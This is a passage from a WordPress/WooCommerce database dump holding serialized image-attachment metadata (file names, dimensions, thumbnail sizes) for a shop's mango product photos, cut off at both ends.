:389;s:4:\"file\";s:14:\"2022/03/04.png\";s:8:\"filesize\";i:320603;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:14:\"04-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:144019;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:14:\"04-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19385;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:12:\"04-50x37.png\";s:5:\"width\";i:50;s:6:\"height\";i:37;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4450;}s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"04-300x225.png\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"04-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:14:\"04-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:14:\"04-500x375.png\";s:5:\"width\";i:500;s:6:\"height\";i:375;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:14:\"04-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:12:\"04-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:12:\"04-48x36.png\";s:5:\"width\";i:48;s:6:\"height\";i:36;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5490,1130,'_wp_attached_file','2022/03/raspuri-mango-pulp-1540987588-1411702-e1646377329845.jpg'),(5491,1130,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:274;s:6:\"height\";i:184;s:4:\"file\";s:64:\"2022/03/raspuri-mango-pulp-1540987588-1411702-e1646377329845.jpg\";s:8:\"filesize\";i:7023;s:5:\"sizes\";a:6:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:64:\"raspuri-mango-pulp-1540987588-1411702-e1646377329845-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2783;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:62:\"raspuri-mango-pulp-1540987588-1411702-e1646377329845-50x34.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:34;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1000;}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:64:\"raspuri-mango-pulp-1540987588-1411702-e1646377175575-150x105.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:105;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:49:\"raspuri-mango-pulp-1540987588-1411702-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:47:\"raspuri-mango-pulp-1540987588-1411702-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:47:\"raspuri-mango-pulp-1540987588-1411702-48x32.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5541,1133,'_wp_attached_file','2022/03/31ZXzqC8K7L.jpg'),(5542,1133,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:272;s:4:\"file\";s:23:\"2022/03/31ZXzqC8K7L.jpg\";s:8:\"filesize\";i:9698;s:5:\"sizes\";a:6:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:23:\"31ZXzqC8K7L-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2462;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:21:\"31ZXzqC8K7L-50x45.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:45;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1045;}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"31ZXzqC8K7L-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"31ZXzqC8K7L-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:21:\"31ZXzqC8K7L-48x44.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:44;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:21:\"31ZXzqC8K7L-48x44.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:44;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5591,1136,'_wp_attached_file','2022/03/malgova-mango-500x500-1.png'),(5592,1136,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:331;s:4:\"file\";s:35:\"2022/03/malgova-mango-500x500-1.png\";s:8:\"filesize\";i:166060;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:35:\"malgova-mango-500x500-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:104518;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:35:\"malgova-mango-500x500-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:15768;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:33:\"malgova-mango-500x500-1-50x33.png\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2667;}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"malgova-mango-500x500-1-300x199.png\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"malgova-mango-500x500-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:35:\"malgova-mango-500x500-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"malgova-mango-500x500-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:33:\"malgova-mango-500x500-1-48x32.png\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:33:\"malgova-mango-500x500-1-48x32.png\";s:5:\"width\";i:48;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5641,1139,'_wp_attached_file','2022/03/images.jpg'),(5642,1139,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:232;s:6:\"height\";i:218;s:4:\"file\";s:18:\"2022/03/images.jpg\";s:8:\"filesize\";i:3824;s:5:\"sizes\";a:6:{s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:18:\"images-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2248;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:16:\"images-50x47.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:47;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1009;}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"images-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:18:\"images-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:16:\"images-48x45.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:45;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:16:\"images-48x45.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:45;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5691,1142,'_wp_attached_file','2022/03/premium-imam-pasand-himayat-mangoes.jpg'),(5692,1142,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:400;s:6:\"height\";i:450;s:4:\"file\";s:47:\"2022/03/premium-imam-pasand-himayat-mangoes.jpg\";s:8:\"filesize\";i:38753;s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:47:\"premium-imam-pasand-himayat-mangoes-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14319;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:47:\"premium-imam-pasand-himayat-mangoes-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1943;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:45:\"premium-imam-pasand-himayat-mangoes-50x56.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:56;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:840;}s:6:\"medium\";a:4:{s:4:\"file\";s:47:\"premium-imam-pasand-himayat-mangoes-267x300.jpg\";s:5:\"width\";i:267;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:47:\"premium-imam-pasand-himayat-mangoes-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:47:\"premium-imam-pasand-himayat-mangoes-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:47:\"premium-imam-pasand-himayat-mangoes-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:45:\"premium-imam-pasand-himayat-mangoes-48x54.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:54;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:45:\"premium-imam-pasand-himayat-mangoes-48x54.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:54;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5838,1130,'_wp_attachment_backup_sizes','a:2:{s:14:\"thumbnail-orig\";a:4:{s:4:\"file\";s:49:\"raspuri-mango-pulp-1540987588-1411702-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"full-orig\";a:3:{s:5:\"width\";i:274;s:6:\"height\";i:184;s:4:\"file\";s:41:\"raspuri-mango-pulp-1540987588-1411702.jpg\";}}'),(5841,1148,'_wp_attached_file','2022/03/raspuri-mango-pulp-1540987588-1411702-1.jpg'),(5842,1148,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:51:\"2022/03/raspuri-mango-pulp-1540987588-1411702-1.jpg\";s:8:\"filesize\";i:44062;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:51:\"raspuri-mango-pulp-1540987588-1411702-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13026;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:51:\"raspuri-mango-pulp-1540987588-1411702-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2714;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:49:\"raspuri-mango-pulp-1540987588-1411702-1-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1252;}s:6:\"medium\";a:4:{s:4:\"file\";s:51:\"raspuri-mango-pulp-1540987588-1411702-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:51:\"raspuri-mango-pulp-1540987588-1411702-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:51:\"raspuri-mango-pulp-1540987588-1411702-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:49:\"raspuri-mango-pulp-1540987588-1411702-1-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:51:\"raspuri-mango-pulp-1540987588-1411702-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:49:\"raspuri-mango-pulp-1540987588-1411702-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:49:\"raspuri-mango-pulp-1540987588-1411702-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5843,1149,'_wp_attached_file','2022/03/avakaya-pckle-mngo1.jpg'),(5844,1149,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1095;s:6:\"height\";i:1150;s:4:\"file\";s:31:\"2022/03/avakaya-pckle-mngo1.jpg\";s:8:\"filesize\";i:152087;s:5:\"sizes\";a:12:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:31:\"avakaya-pckle-mngo1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14457;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:31:\"avakaya-pckle-mngo1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3068;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:29:\"avakaya-pckle-mngo1-50x53.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:53;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1380;}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"avakaya-pckle-mngo1-286x300.jpg\";s:5:\"width\";i:286;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"avakaya-pckle-mngo1-975x1024.jpg\";s:5:\"width\";i:975;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"avakaya-pckle-mngo1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"avakaya-pckle-mngo1-768x807.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:807;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"avakaya-pckle-mngo1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"avakaya-pckle-mngo1-50x53.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:53;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"avakaya-pckle-mngo1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:29:\"avakaya-pckle-mngo1-48x50.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:29:\"avakaya-pckle-mngo1-48x50.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(5846,1150,'_wp_attached_file','2022/03/devgad-alphonso1-1.jpeg'),(5847,1150,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:450;s:6:\"height\";i:450;s:4:\"file\";s:31:\"2022/03/devgad-alphonso1-1.jpeg\";s:8:\"filesize\";i:40414;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:31:\"devgad-alphonso1-1-320x320.jpeg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15369;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:31:\"devgad-alphonso1-1-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2878;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:29:\"devgad-alphonso1-1-50x50.jpeg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1212;}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"devgad-alphonso1-1-300x300.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"devgad-alphonso1-1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"devgad-alphonso1-1-320x320.jpeg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"devgad-alphonso1-1-50x50.jpeg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"devgad-alphonso1-1-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:29:\"devgad-alphonso1-1-48x48.jpeg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:29:\"devgad-alphonso1-1-48x48.jpeg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5848,1151,'_wp_attached_file','2022/03/devgad-alphonso1-2.jpeg'),(5849,1151,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:450;s:6:\"height\";i:450;s:4:\"file\";s:31:\"2022/03/devgad-alphonso1-2.jpeg\";s:8:\"filesize\";i:40414;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:31:\"devgad-alphonso1-2-320x320.jpeg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15369;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:31:\"devgad-alphonso1-2-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:2878;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:29:\"devgad-alphonso1-2-50x50.jpeg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:1212;}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"devgad-alphonso1-2-300x300.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"devgad-alphonso1-2-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"devgad-alphonso1-2-320x320.jpeg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"devgad-alphonso1-2-50x50.jpeg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"devgad-alphonso1-2-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:29:\"devgad-alphonso1-2-48x48.jpeg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:29:\"devgad-alphonso1-2-48x48.jpeg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5851,1152,'_wp_attached_file','2022/03/devgad-2.jpg'),(5852,1152,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2500;s:6:\"height\";i:2500;s:4:\"file\";s:20:\"2022/03/devgad-2.jpg\";s:8:\"filesize\";i:513478;s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:20:\"devgad-2-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15310;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:20:\"devgad-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\